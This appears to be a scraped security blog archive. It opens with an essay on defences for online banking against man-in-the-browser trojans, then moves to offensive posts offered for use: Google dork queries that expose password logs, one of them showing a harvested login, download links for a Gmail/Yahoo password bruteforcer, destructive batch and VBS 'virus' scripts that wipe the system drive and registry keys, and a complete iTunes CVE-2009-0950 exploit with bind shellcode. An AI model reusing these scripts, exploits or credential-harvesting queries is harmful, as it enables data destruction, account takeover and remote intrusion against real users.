Techniques explaining here are not there to prevent bad guys from accessing your banking accounts. Rather assume that you are infected with some banking/MITB Trojans, your account, all authenticated tokens are fully comprised (how? see my previous article). Is there something which can still protect your money? Yes there is still room for an added anti MITB layer.

Technique # 1 (Secondary Communication Device)

All the money transfer requests should be re-verified using some secondary communication device like user's cellular phone. User should be notified on his cellular phone about the account number and the beneficiary to whom money is being transferred. Bank will not execute the actual transfer unless user replies with an acknowledgment via SMS back to the banking server. Using this, any change in the beneficiary information or money transfers to unknown accounts would raise an alarm, a no from user would fail the unauthorized transaction. It looks a very good technique and some of the modern banks are already using it.

I can only sense two problems with this technique.

Problem 1. Most vulnerable part of this technique is that most banks also offer configuring these cellular phone via online banking, bad isn't it? Like in case of Bank of America, user will have to go through the 'Safety Pass' based authentication in order to change the primary 'Safety Pass' (mostly user's cell phone) device. In my last article I explained how its possible for modern MITB trojans to snatch this 'Safety Pass' . Once attacker is able to change the user cellular phone with its own device, he shouldn't have any problems making authorized transactions.

Solution:

Banks should never offer their users to configure and change their Safety pass devices via online banking. User can either request it over the phone and/or by visiting the bank facility.

Problem 2. Every such protection comes with a level of inconvenience for the end user. Corporate customers involved in making these transaction in bulk might get annoyed with this secondary check. People who often travel abroad might not have access to their cellular phone all the times unless they have roaming turned on. Their might be other cases too but I leave them to reader's own imagination and/or personal experience.

Technique # 2 ( Random Keyboard)

This second technique doesn't need a secondary communication device for checking the integrity of money transfer requests. The bases of this authentication scheme is a secret keyboard. Once user opens a new banking account, user will receive a paper keyboard through regular mail.

In this keyboard every key will have an alternate key like:

A might be Z
L might be C
I might be K
C might be J
E might be M
B might be G
O might be H

This alternate keyboard layout will be randomly generated for each customer. Just imagine that if user wants to transfer $ 10, 000 to Alice , he'll have to replace the Alice, her account number and amount etc with the alternate keys, like Alice will be translated into ZCKJE. As bank would get the transaction request it will decode all the values back to original using the exact same keyboard and execute the transaction. Now just assume that attacker wants to transfer funds to his money mule Bob, unless attacker knows about the complete random keyboard or alternate keys for Bob, it can never encode it right. Simply entering Bob as the beneficiary will be decoded as GHG by the bank. An invalid account information will obviously fail the entire transaction.

I can see few problems with this approach as well.

Problem 1: Inconvenience for the user. Would an average Joe will be willing to spend some time reading the paper keyboard and entering beneficiary account information using alternate keys. Although most of the banks offer creating payee's profiles to avoid entering the same information again and again. But it's still lots of work for people who solely use online banking for their convenience.

Solution 1:

Banks may introduce a custom device for their customers with a small key pad (alpha numeric) only. This device should resemble with a standard calculator with a small screen. User will have to enter actual text using this keypad and device will encode it with user specific (part of firmware) keyboard. Efficiency can further be improved if banks offer this encoded device in form of a mobile (only) application like for iPhone and/or Blackberry. This will prevent user from carrying a hard device at the time of adding new payee.

Solution 2:

In case of manual encoding another approach might be used to reduce inconvenience by making this job easier for the end user. Instead of asking user to encode all the beneficiary account information, let him just encode the most variable information like payee name. Without the ability to fully encode money mule name, unauthorized transaction can't take place even if the other account information like IBAN or Swift code is correct.

Problem 2: Technique # 2 is open to sample space attacks. There are certain information like Swift code or IBAN which are suppose to be constant for each bank. How many banks are there in America? A guessing attack might reveal some portion of the keyboard layout. Although partial knowledge of user keyboard might not be enough to fill in all the payee information.

Solution 1:

To prevent sample space attacks, SWIFT code and IBAN should not be offered for encoding, this not only would save the user time but will also reduce the chances of sample space attack. Only the most variable information like payee name should be offered for encoding. Additionally if the custom device is an option then banks might go for a better encryption scheme like AES 192 bit. Communication will be encrypted using a user specific private key, known only to device itself and the banking server.

To further enhance the payee name based manual encoding, we might introduce a slightly different keyboard having only 24 alphabet characters. Each character would translate into a variable length random character strings (1 to 3 characters long) with frequent use of duplicate characters in the sub-situation strings.This type of encoding should be enough to bypass all the sample space attacks.

Example 1:

A --- > BC

T ---> CC

I -- > Z

F --> AFG

so Atif will be encoded like BCCCZAFG, easliy bypassing the character frequency and length based name guessing.

Example 2:

A --- > C

T ---> ZYK

I -- > QY

F --> L

Here Atif would be encoded as CZYKQYL.

Problem 3: A social engineering based MITB attack might crack this technique as well. Just assume that one day a user while trying to login to its online account finds that banking web site is asking him (html injection via MITB) to encode money mule name or account number for some so called verification. Fooled by this trick user might end up giving encoded money mule name to the attacker, which can further be used to make the unauthorized transaction. Although most of these identity theft incidents involve money transfer to the multiple money mules (due to amount upper cap) and it might not be easy for attacker to convince user for encoding so many money mules names.
Solution:

Custom device or paper keyboard should have a clear text warning, something like this:

"Banking web site will never ask you to enter any information using the device. Encoding any information using this device can be used for transferring funds from your account to some external account. Are you sure you are intended to transfer funds to this payee." (Y/N)

Although I can still imagine that some user might simply overlook this warning. Sad isn't it.

I am almost done, none of the solution mentioned above seems perfect. A security system can only be as good as its own user. There is no remedy for the human stupidity.

I would like to finish my article with some general advice to all the online banking users.

1. If you are not one of those guys who perform money transfers often. Just ask your bank to disable this feature for you. On the other end banks should not offer enabling it through online banking.

2. If possible put a minimum limit on amount and number of wire transfers within a certain amount of time.

3. Choose banks which provide you better security options especially something involving secondary devices.

4. Keep your static big cash or long term investment into a separate bank account possibly with online banking disabled. Paper checks and statements are not a bad option even these days.

I won't suggest that users should start using some operating system other than MS Windows. I believe other OS's are not inherently secure either. If more users move to another OS, then so would cyber criminals who are using and sponsoring banking Trojans.

2010-02-25T15:23:00.000+05:30

Hacking usernames and password with Google

2009-08-03T19:40:00.000+05:30

In this guide I will try my best to teach you how to use google to get your usernames and passwords for random sites....
Its pretty simple and all you need is a brain

--------------------
Tutorial By Casi
@ CyberXtreme.info
--------------------

So lets get started...

Start u your favorite internet browser, I am using firefox

Then go to
Code:
www.google.comAnd type in the below code

Code:
filetype:log inurl:*password.log"This will find all websites that stored a "password.log" on their servers, and you will be able to see the login and password for different users to different sites
Now google is being a bit smart asses, and you wont get the results on the 1st page, at least I did not, so bump out to 3+ pages and they started showing up for me

Below is an example of what I got

Code:
name: = "procesos"; password: = "procesos"; URL: = "http://ayura.udea.edu.co/Here comes a 2nd way to do it, better and more effective in my opinion...

Once again, go to google

Type in the code below

Code:
ext:pwd inurl:(service authors administrators users) *#-FrontPage-*Hit Search and.. youll get it by there..

Gmail and Yahoo Bruteforcer

2009-07-30T12:36:00.000+05:30

Gmail and Yahoo Bruteforcer

--------------------------------------------------------------------------------

Gmail and Yahoo Bruteforcer

This is probably one of the best things. A cracker for both Gmail & Yahoo.

If it doesn't work, Extract the .exe file on your desktop, right click on it, and press run as administrator.
DownloaD

Code:
http://rapidshare.com/files/199124494/MailBruteforcer.rar

1gig wordlist compressed to a 5mb archive

http://digg.com/security/1GB_Wordlis..._a_5Mb_Archive

EDIT-------------
RUN THROUGH SANDBOX HAVNT BEEN TESTED

Download: http://www.megaupload.com/?d=3YQT6SRB
Mirror2: http://www.filefactory.com/file/afh8...Bec0de_com_rar
Mirror3: http://www.sendspace.com/file/0ik9fx

Security Webs & Blogs & Podcasts

2009-07-27T15:25:00.000+05:30

Webs

Spain
www.dgonzalez.net Diego González Gómez
www.javierpages.com (Blog: www.inforenses.com) Javier Pagès
www.ausejo.net Rafael Ausejo Prieto
www.seguridaddelainformacion.com Vicente Aceituno
Apuntes de seguridad de la información (Blog) Javier Cao Avellaneda
Jessland Jess Garcia
Hispasec Blog (Hispasec)

Worldwide Blogs

Spain

Worldwide

www.chuvakin.org (www.info-secure.org) Anton Chuvakin - Security Warrior

www.counterhack.net Ed Skoudis - (Counter)hacking, Malware, Security Challenges

Joshwr1ght Joshua Wright - Wireless Security

www.zeltser.com (Information Security Search engine) Lenny Zeltser - GSE

www.hexblog.com Ilfak Guilfanov - IDA Pro

www.schneier.com (Blog: www.schneier.com/blog/) Bruce Schneier

www.sysinternals.com (Blog: www.sysinternals.com/blog/) Mark Russinovich - Windows
Internals

grc.com (Discussions) Steve Gibson (GRC) - Windows

www.petefinnigan.com (Blog: Oracle Security and Forums) Pete Finnigan - Oracle Security

www.trouble.org (www.fish2.com) Dan Farmer - Forensics

www.porcupine.org Wietse Venema - Forensics

www.digital-evidence.org (Sleuthkit) Brian Carrier - Forensics

johnny.ihackstuff.com Johnny Long - Google Hacking (GHDB)

honeyblog.org (Blog) Thorsten Holz

www.wormblog.com (Blog) Jose Nazario

PaulDotCom's Web Site (Blog) Paul Asadoorian

Hack a day Hack a day (beta) Blog

isc.sans.org Handler's Diary - ISC

The Black Page Blackhat: highlights breaking security research

Security Podcasts

Security (... professionals)

Cyberspeak Computer Forensics, Network Security and Computer Crime Podcast

Security Now! Audio security column & podcast by Steve Gibson (GRC) and Leo Laporte

PaulDotCom's Podcast Paul Asadoorian security podcasts (podcasts roundup)

SABAG security Two guys from McAfee, a bit of security and some toast... (CISSP CPEs)

McKeay RSS Martin McKeay's Network Security Podcast

Blue Box The VoIP Security Podcast

Crypto-Gram security podcast RSS Audio of Bruce Schneier's Crypto-Gram Newsletter

The Security Catalyst For anyone interested in security - home users to professionals (CISSP)

Security (... hacking)

Sploitcast The podcast for hackers, geeks, and the security paranoid

BinRev Binary Revolution radio: The Revolution will be Digitized!

Hackermedia Hackermedia is on the air

LiveAmmo Radio

Ninja Night School

The Packet Sniffers Video shows

The hackers voice UK (Continuous radio - NO podcast)

T.W.A.T radio

Hack5 videos VIDEOS

Security News & Managerial

SearchSecurity.com's Security Wire Weekly

Gartner Voice Podcasts for business and IT professionals

CSOonline CSO's executive podcast

CIO Security CIO's security podcast

IT
Geek Muse IT OS geeks Podcast (& Blog) - referenced by Labrat-
In the trenches The podcast for Sys Admins (Kevin Devin)
Friends in tech

--------------------------------------------------------------------------------

The 8 deadly windows .vbs commands

2009-07-26T10:54:00.002+05:30

Note:- The Following tutorial is for educational purpose only. If you harm your or your friend’s computer using the following tutorial

I am going to provide some of my favorite .vbs codes, I use to play with in my childhood days. You can use these codes as a small term virus. Hence , you can also call this tutorial a virus creation tutorial.

To use the codes I am going to provide, all you need to do is to copy the codes from iTechnoBuzz, paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.

-The blue screen of Death [this might be dangerous]

Code:-

Code:

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

-Stupidity Shutdown

*This pops up a funny message then will shutdown the computer*

code:-

Code:

@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10

-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*

Code:-

Code:

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE

-Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

Code:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

-Crazy caps lock

*This constantly turns caps lock on and off really fast continuously*

Code:-

Code:

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

-Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Code:

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

-Endless Backspace

*This makes it so the backspace key is constantly being pressed*

Code:-

Code:

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

-Popping CD Drives

*This will make the CD drives constantly pop out*

Code:-

Code:

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
__________________

[0]day itunes exploit

2009-07-26T10:52:00.000+05:30

#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>

from socket import *

html = """

iTunes loading . . .

iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950

ryujin __ A-T __ offensive-security.com

www.offensive-security.com

iTunes starting... wait for 20 secs; if you get an error, click "Ok"
in the MessageBox before checking for your shell on port 4444 :)

If victim host is not connected to the internet, exploit will fail
unless iTunes is already opened and you disable "openiTunes" javascript
function.

This exploit works if opened from Firefox not from IE!

After exploitation iTunes crashes, you need to kill it from TaskManager

have fun!

"""

# Alpha2 ASCII printable Shellcode 730 Bytes, via EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode is modified
# in order to obtain register alignment and to reset ESP and EBP we mangled
# before. Rest of decoded shellcode is Metasploit bind shell on port 4444
# EXITFUNC=thread
#
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
"5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
"tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
"uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
"KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
"8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
"b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
"k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
"EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
"0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
"ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
"KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1 = "\x41"*425

# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10

# Padding
pad0x2 = "\x41"*570

# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret = "\x2a\x5e\x21\x67"

# Let the dance begin... Point EBP to encoded jmp
align_for_jmp = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7

# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
"AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3 = "\x43"*162

# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1 = "itms://:" + "\x41"*200 + "/"
url2 = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
align_for_jmp + jmp_back + pad0x3
payload = html % (url1, url2)

print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()

Anonymous Surfing Tool 2009

2009-07-26T10:48:00.000+05:30

01 #1 Anonymous Proxy List Verifier 1.1
02 Anonimity 4 Proxy2.8
03 Charon 0.6
04 Get Anonymous 2.1
05 GhostSurf Platinum
06 Hide ip Platinum 3.42
07 Hide The Ip 2.1.1
08 Invisible Browsing 5
09 IP Switcher Professional 1.01.12.0
10 MultiProxy v1.2
11 NetConceal Anonymity Shield 5.2.059.02
12 Proxy Switcher Standard 3.7.2.3913
13 Proxygrab 0.6
14 proxyway extra v3.2
15 SmartProxyHelper 1.5
16 Steganos Internet Anonym v8.0.1
etc.

Code:
http://uploading.com/files/BHFKMOMA/IP_Anonymous_Surfing_Tool_2009.rar.html

Security Is A Culture

Mr. Android 2011

Security Terms in Simple English

Anti-Virus

Drive-by Download

Exploit

Firewall

Malware

Patch

Phishing

Social Engineering

Spear Phishing

Virus, Worm, Trojan

Vulnerability

9 Convenient Lies in Information Security

Tips for creating a secure password

3 Reasons Why People Choose to Ignore Security Recommendations

7 Inconvenie​nt Truths for Informatio​n Security

What Is Advanced Persistent Threat (APT) ?

Patriot is a 'Host IDS' for Windows

Improve Your Information Security Resume

[Public Shadowserver] The Conficker Working Group Lessons Learned Document

The 12 information security principles for information security practitioners

Computer Monitoring Tools

Recognizing phishing and online scams

Cyber Security Awareness - Securing the Family PC

Zeus In The Mobile (Zitmo): Online Banking’s Two Factor Authentication Defeated

Worst U.S. military security breach ever

Epic -A Browser Made For Indians By Indians

httpry-A specialized packet sniffer designed for displaying and logging HTTP traffic.

Application Security Checklists

NEW PROPOSED Top 7 Essential Log Reports

GARTNER: COMPANIES SHOULDN'T BOTHER BANNING FACEBOOK, SOCIAL

Honey Pot -HoneyBOT v1.7 released!

Metasploitable-VM Image

IDA Pro

Responder™ Professional

WinAPIOverride32:an advanced api monitoring software.

RTIR -A premiere Open Source incident handling system.

Google Criticized for 'Buzz' Privacy Faults

Payment Card Industry Rock

StreamArmor – Discover & Remove Alternate Data Streams (ADS)

Flint – Web-based Firewall Rule Scanner

Critical Log Review Checklist for Security Incidents

Google Talk used to distribute Fake AV

Top 10 Ways to avoid Phishing Scams - Please Forward To All Non-IT People You Konw.

How to Protect Yourself from ZeuS

Zeus Trojan Now Has Hardware Licensing Scheme

Google search reveals 3 million pages link to rogue AVs

Fixing the Windows Registry Using Backtrack

Remote VNC Installation

New phishing campaign against Facebook led by Zeus

Evil Sports Sites

Password cracker 100 times faster with an SSD

Rainbow Cracking - MD2, MD4, MD5, SHA1,L1

Hackers leave Orissa Govt website ‘tipsy-turvy’

Bypassing Firewalls Using Reverse Telnet

Hostmap

404 error:

Don't Play Poker on an Infected Table - Part Three

Vodafone Android Phone: Complete with Mariposa Malware

SAHI – Web Automation & Application Security Testing Tool

Scam Alert - Cute (and malicious) - funny picture from Facebook friends

Browser Exploitation

Professional Hacker Online-They Say Soooo

SEO poisoning on TV show

PDF Info Stealer PoC

Phishing database

Oficla botnet with more than 200,000 zombies recruits

DoD Endorses Certification for Hackers

Automation in creating exploits

What is your firewall log telling you - Part #2

What is your firewall telling you and what is TCP249? (Part1)

The Samurai Web Testing Framework

Why DRM Doesn’t Work

THE GEEK CODE

Tutorial: Real Life HTTP Client-side Exploitation Example

Ncrack – High Speed Network Authentication Cracking Tool

Rootkit.TDSS - A malware

SEO Poisoning Sites Use Flash for Redirection

7 Inconvenient Truths for Information Security